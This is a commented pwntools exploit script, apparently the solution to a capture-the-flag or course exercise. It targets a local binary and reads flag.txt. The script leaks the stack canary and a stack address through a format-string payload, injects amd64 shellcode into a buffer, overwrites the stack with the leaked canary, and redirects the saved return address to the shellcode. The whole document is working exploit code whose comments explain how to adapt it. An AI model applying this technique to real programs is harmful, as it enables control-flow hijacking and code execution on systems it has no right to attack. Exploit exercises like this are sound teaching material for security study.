from pwn import *

#Define the current architecture
#This is important for the asm(...) function
context.arch = "amd64"

#The format string will be used to leak the stack canary and some stack address
payload_1 = "%p  " * 32
#We truncate the last space
payload_1 = payload_1[:-1]
#Here, the shellcode is built. This code will land in the x_values buffer
#and print the flag if executed.
shellcode = asm(shellcraft.amd64.cat("flag.txt"))
#Start the process and send the format string as a payload
p = process("./out")
p.send(payload_1)
#The timeout in the recv() call is used to avoid stalling the script if the program
#does not respond. If you want to receive until a certain string s is encountered, you 
#can used recvuntil(s)
r1 = p.recv(timeout=1)
#Split the string that we just received
r1 = r1.split(b" ")
#Using gdb and some visual inspection, we learnt that the stack canary will be found at 
#this offset in the received array 
canary = r1[-18]
#Debug output
print(b"Canary is " + canary)
#The leaked stack value will always be at this offset in the array 
leaked_stack = r1[-8]
#Calculate the address of the x_values buffer by subtracting the constant offset
#which we found using gdb. The offset is equal to leaked_stack_address - (size_t)&x_values in gdb.
x_values_addr = int(leaked_stack,16) - 0x608
print("Predicted x values address: " + hex(x_values_addr))
#Convert the shellcode byte string to an array of 8-byte bytestrings
#The slicing here depends on the data type that the target program reads.
shellcode_bytes = [shellcode[i*8:(i*8+8)] for i in range(len(shellcode) // 8 + len(shellcode) % 8)]

#Uncommenting the following lines will attach a debugger to the process which will break after
#the input is fed to the program. There you can observe the stack of calcEuclidianNorm 
#g = gdb.attach(p, '''b 22
#	c''')

#Send each entry in the shellcode bytestring array as a
#size_t to the program
for e in shellcode_bytes:
	if e == b'':
		continue
	p.sendline(str(int.from_bytes(e,"little")))

#Fill the stack with the canary that was leaked before. 
for i in range(129):
	p.sendline(str(int(canary,16)))
#Write the address of the x_values buffer to the stored return address, thus changing the 
#control flow of the program
p.sendline(str(int(x_values_addr)))
#Send an empty line to terminate the input loop of the program
p.sendline("")	
#Receive all remaining output
print(p.recvall(timeout=0.5))
